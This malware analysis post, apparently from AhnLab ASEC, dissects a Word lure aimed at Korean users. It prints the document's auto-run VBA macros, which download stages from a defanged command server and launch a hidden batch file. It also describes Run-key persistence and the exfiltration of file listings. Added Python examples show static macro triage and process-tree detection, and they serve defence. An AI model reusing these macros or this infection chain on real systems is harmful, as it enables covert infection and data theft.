The ASEC analysis team has discovered a malicious Word file being distributed to Korean users. The file is named Design Modification Request.doc, and its body contains an image that prompts the user to enable the macro.
As shown below, the Word file contains a malicious macro that downloads additional files from hxxp://filedownloaders.com/doc09. When the user clicks Enable Content, the Document_Open macro runs automatically and fetches the additional malicious files.
Sub Document_Open()
    Dim RetVal As Long
    ' download_func is the macro's own wrapper around a file-download API; its Declare line is not shown in the post.
    ' Each call fetches one stage from the C2 and drops it into the world-writable Public\Documents folder.
    RetVal = download_func(0, "hxxp://filedownloaders[.]com/doc09/no6.txt", "C:\Users\Public\Documents\no1.bat", 0, 0)
    RetVal = download_func(0, "hxxp://filedownloaders[.]com/doc09/vbs6.txt", "C:\Users\Public\Documents\setup.cab", 0, 0)
    RetVal = download_func(0, "hxxp://filedownloaders[.]com/doc09/temp0101.doc", "C:\Users\Public\Documents\temp.doc", 0, 0)
    ' Open the downloaded decoy document in a new, visible Word instance.
    Dim OpenDoc: Set OpenDoc = CreateObject("Word.Application")
    OpenDoc.Visible = True
    Dim WorkDone: Set WorkDone = OpenDoc.Documents.Open("C:\Users\Public\Documents\temp.doc")
End Sub
It then opens the downloaded temp.doc. That document contains text impersonating a Korean company, and it carries its own Document_Open macro, shown below, which launches the batch file dropped by the first stage.
Sub Document_Open()
    ' WinExec launches the batch file; the second argument 0 (SW_HIDE) keeps the console window hidden.
    WinExec "C:\Users\Public\Documents\no1.bat", 0
End Sub
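Both macros above can be triaged statically, without opening the document in Word. The following Python is an added example (not ASEC's code or tooling): it scans VBA source text for auto-run entry points, download wrapper calls and the URL-to-drop-path pairs they carry, the hand-off to a second document, and WinExec-style launches, then refangs the URLs so they match live telemetry. The macro text embedded below is reconstructed from the two macros quoted in the post; the guess that download_func aliases urlmon's URLDownloadToFile is an assumption, since the Declare line is not shown.

```python
"""Static triage of VBA macro source (added example; not ASEC's code).

Extracts the indicators the analysis above turns on: auto-run entry points,
download wrapper calls and the URL -> drop-path pairs they carry, the hand-off
to a second document, and process launches such as WinExec. The sample macro
text is reconstructed from the two macros quoted in the post.
"""
import re

# Entry points Office runs with no user action beyond "Enable Content".
AUTO_RUN = re.compile(
    r"\bSub\s+(Document_Open|AutoOpen|Auto_Open|Workbook_Open)\s*\(", re.I)
# download_func is the name used in the post's macro; URLDownloadToFile is the
# urlmon API such wrappers usually alias (assumption: the Declare line is not shown).
DOWNLOAD_CALL = re.compile(r"\b(download_func|URLDownloadToFile[AW]?)\s*\(", re.I)
# Declare statements that import Win32 APIs into the macro.
DECLARE = re.compile(r'\bDeclare\b.*?\bLib\s+"([^"]+)"', re.I)
EXEC_CALL = re.compile(r"\b(WinExec|Shell|ShellExecute[AW]?|CreateProcess[AW]?)\b", re.I)
# URLs in string literals, live or defanged (hxxp, [.]).
URL = re.compile(r'"((?:hxxp|http)s?://[^"]+)"', re.I)
# "<url>", "<local path>" argument pairs: what is fetched and where it lands.
URL_TO_PATH = re.compile(
    r'"((?:hxxp|http)s?://[^"]+)"\s*,\s*"([A-Za-z]:\\[^"]+)"', re.I)
OPEN_DOC = re.compile(r'Documents\.Open\s*\(\s*"([^"]+)"', re.I)
# World-writable staging folder used by every stage in the post.
PUBLIC_DIR = re.compile(r'"C:\\Users\\Public\\', re.I)


def refang(url):
    """Turn hxxp://a[.]b into http://a.b so the value matches live telemetry."""
    return re.sub(r"^hxxp", "http", url.replace("[.]", "."), flags=re.I)


def triage_macro(source):
    """Return a dict of indicators found in one macro's source text."""
    return {
        "auto_run": [m.group(1) for m in AUTO_RUN.finditer(source)],
        "imports": DECLARE.findall(source),
        "download_calls": len(DOWNLOAD_CALL.findall(source)),
        "downloads": [(refang(u), p) for u, p in URL_TO_PATH.findall(source)],
        "urls": sorted({refang(u) for u in URL.findall(source)}),
        "opens_document": OPEN_DOC.findall(source),
        "exec_calls": sorted({m.group(1) for m in EXEC_CALL.finditer(source)}),
        "writes_public_dir": bool(PUBLIC_DIR.search(source)),
    }


def score(result):
    """Weight: network fetch and process launch count double; 4 or more is worth an analyst's time."""
    s = 0
    s += 1 if result["auto_run"] else 0
    s += 2 if result["download_calls"] or result["downloads"] else 0
    s += 2 if result["exec_calls"] else 0
    s += 1 if result["opens_document"] else 0
    s += 1 if result["writes_public_dir"] else 0
    return s


# Reconstructed from the post: stage 1 (the lure document) and stage 2 (temp.doc).
STAGE1_MACRO = r"""
Sub Document_Open()
    Dim RetVal As Long
    RetVal = download_func(0, "hxxp://filedownloaders[.]com/doc09/no6.txt", "C:\Users\Public\Documents\no1.bat", 0, 0)
    RetVal = download_func(0, "hxxp://filedownloaders[.]com/doc09/vbs6.txt", "C:\Users\Public\Documents\setup.cab", 0, 0)
    RetVal = download_func(0, "hxxp://filedownloaders[.]com/doc09/temp0101.doc", "C:\Users\Public\Documents\temp.doc", 0, 0)
    Dim OpenDoc: Set OpenDoc = CreateObject("Word.Application")
    OpenDoc.Visible = True
    Dim WorkDone: Set WorkDone = OpenDoc.Documents.Open("C:\Users\Public\Documents\temp.doc")
End Sub
"""

STAGE2_MACRO = r"""
Sub Document_Open()
    WinExec "C:\Users\Public\Documents\no1.bat", 0
End Sub
"""

if __name__ == "__main__":
    for name, src in (("stage1", STAGE1_MACRO), ("stage2", STAGE2_MACRO)):
        r = triage_macro(src)
        print(name, "score", score(r), "exec", r["exec_calls"])
        for url, path in r["downloads"]:
            print("  fetch", url, "->", path)
```

In practice the source text would come from a macro extractor such as olevba rather than from a string literal; the point of the regexes is that the fetch-then-launch pattern, plus the Public folder as a drop location, is visible in the source long before any of the stages execute.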
no1.bat, launched from temp.doc, runs vvire.bat. If vvire.bat does not yet exist, it first extracts it from setup.cab (the file downloaded from hxxp://filedownloaders.com/doc09/vbs6.txt) and then runs it.
vvire.bat does three things: it sets up persistence in the registry, runs no4.bat, and downloads additional files.
It registers Start.vbs in the registry so that vvire.bat is launched automatically, runs no4.bat, and then deletes no1.bat. It next checks whether a particular file exists, downloads an additional file from hxxp://senteroman.com/dow11/%COMPUTERNAME%.txt (the URL is built from the victim's computer name, so each host gets its own payload) and runs it. That file could not be retrieved at the time of analysis, so its contents could not be examined.
The figure below shows the Start.vbs file.
no4.bat, launched by vvire.bat, collects the following information from the victim's PC and uploads it to hxxp://senteroman.com/upl11/upload.php:
- File listing of C:\Users\%username%\downloads\
- File listing of C:\Users\%username%\documents\
- File listing of C:\Users\%username%\desktop\
- File listing of C:\Program Files\ (installed software)
- IP address information
When no4.bat runs, the collected information is written to files in the C:\Users\Public\Documents\ folder, and once the upload completes it creates upok.txt as a marker that the exfiltration succeeded.
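The chain from the second macro onward leaves a distinctive process tree: Word launches cmd.exe on a batch file under C:\Users\Public\Documents, a batch file writes a Run value pointing at a .vbs, and the script host later runs that .vbs from the same folder. The Python below is an added example (not ASEC's code) showing how to express this as detection logic over process-creation events. The events are constructed Sysmon-style records that mirror the chain described above; the reg.exe command line, the HKCU Run key and the value name are assumptions about how vvire.bat writes the registry, since the post only says that Start.vbs is registered so that vvire.bat runs automatically.

```python
"""Process-tree detections for the Word -> batch -> Run-key chain (added example; not ASEC's code).

Events are simplified Sysmon Event ID 1 records (pid, ppid, image, cmdline).
SAMPLE_EVENTS is constructed to mirror the chain in the post; the reg.exe
command line, HKCU Run key and value name are assumptions.
"""
import re

OFFICE_IMAGES = {"winword.exe", "excel.exe", "powerpnt.exe"}
SCRIPT_HOSTS = {"cmd.exe", "wscript.exe", "cscript.exe", "powershell.exe", "mshta.exe"}
VBS_HOSTS = {"wscript.exe", "cscript.exe"}
PUBLIC_DIR = re.compile(r"c:\\users\\public\\", re.I)
RUN_KEY = re.compile(r"\\currentversion\\run(once)?\b", re.I)
SCRIPT_FILE = re.compile(r"\.(vbs|bat|cmd|js|ps1)\b", re.I)


def image_name(path):
    """Lower-cased file name of an image path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def ancestry(by_pid, pid, limit=32):
    """Image names from the process up to the root, or until the chain breaks or loops."""
    chain, seen = [], set()
    while pid in by_pid and pid not in seen and len(chain) < limit:
        seen.add(pid)
        ev = by_pid[pid]
        chain.append(image_name(ev["image"]))
        pid = ev["ppid"]
    return chain


def detect(events):
    """Return (rule, pid, ancestry) for every event that matches one of the three rules."""
    by_pid = {e["pid"]: e for e in events}
    findings = []
    for ev in events:
        name = image_name(ev["image"])
        cmd = ev["cmdline"]
        chain = ancestry(by_pid, ev["pid"])
        # Rule 1: an Office process (anywhere up the tree) ends in a script host
        # running something out of the Public folder, i.e. the WinExec stage.
        if name in SCRIPT_HOSTS and PUBLIC_DIR.search(cmd) \
                and any(a in OFFICE_IMAGES for a in chain[1:]):
            findings.append(("office_to_script_in_public", ev["pid"], chain))
        # Rule 2: reg.exe writing a Run/RunOnce value whose data is a script file.
        if name == "reg.exe" and RUN_KEY.search(cmd) and SCRIPT_FILE.search(cmd):
            findings.append(("run_key_to_script_file", ev["pid"], chain))
        # Rule 3: the persistence firing later: wscript/cscript on a .vbs under Public,
        # with no Office process in the tree (parent is typically explorer.exe).
        if name in VBS_HOSTS and PUBLIC_DIR.search(cmd) and re.search(r"\.vbs\b", cmd, re.I):
            findings.append(("vbs_host_from_public_dir", ev["pid"], chain))
    return findings


# Constructed events (not real telemetry) following the chain in the post.
SAMPLE_EVENTS = [
    {"pid": 100, "ppid": 1, "image": r"C:\Windows\explorer.exe", "cmdline": "explorer.exe"},
    {"pid": 4120, "ppid": 100, "image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "cmdline": r'"WINWORD.EXE" /n "C:\Users\alice\Downloads\Design Modification Request.doc"'},
    # temp.doc's macro: WinExec on the dropped batch file.
    {"pid": 4188, "ppid": 4120, "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r'C:\Windows\System32\cmd.exe /c "C:\Users\Public\Documents\no1.bat"'},
    {"pid": 4204, "ppid": 4188, "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r'cmd /c "C:\Users\Public\Documents\vvire.bat"'},
    # Assumed form of the persistence write; the post only names Start.vbs.
    {"pid": 4230, "ppid": 4204, "image": r"C:\Windows\System32\reg.exe",
     "cmdline": r'reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v Start /t REG_SZ /d "C:\Users\Public\Documents\Start.vbs" /f'},
    {"pid": 4250, "ppid": 4204, "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r'cmd /c "C:\Users\Public\Documents\no4.bat"'},
    # Benign noise that must not fire.
    {"pid": 5000, "ppid": 100, "image": r"C:\Windows\System32\notepad.exe", "cmdline": "notepad.exe"},
    # Next logon: the Run value launches Start.vbs from explorer.exe, no Office in the tree.
    {"pid": 5100, "ppid": 100, "image": r"C:\Windows\System32\wscript.exe",
     "cmdline": r'wscript.exe "C:\Users\Public\Documents\Start.vbs"'},
]

if __name__ == "__main__":
    for rule, pid, chain in detect(SAMPLE_EVENTS):
        print(f"{rule:28s} pid={pid:<5d} {' <- '.join(chain)}")
```

Rule 1 fires on every cmd.exe in the chain because each has WINWORD.EXE as an ancestor, which is what makes the pattern robust to the batch-to-batch hops; rule 3 is the one that still catches the infection after a reboot, when the Office parent is long gone and the only clue left is a script host reading from C:\Users\Public\Documents.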
Malicious documents like this one, which impersonate legitimate senders to lure users into enabling macros, are being distributed continuously, so users must stay vigilant. Users should also configure Office so that macros in documents do not run automatically, and refrain from opening suspicious documents.
[Relevant IOC Info]
Subscribe to AhnLab’s next-generation threat intelligence platform ‘AhnLab TIP’ to check related IOC and detailed analysis information.
[…] discovered a Word document that is in the same category as the document introduced in the post <Word File Disguised as a Design Modification Request for Information Theft>, uploaded in December last year. The title of the document confirmed in this case is […]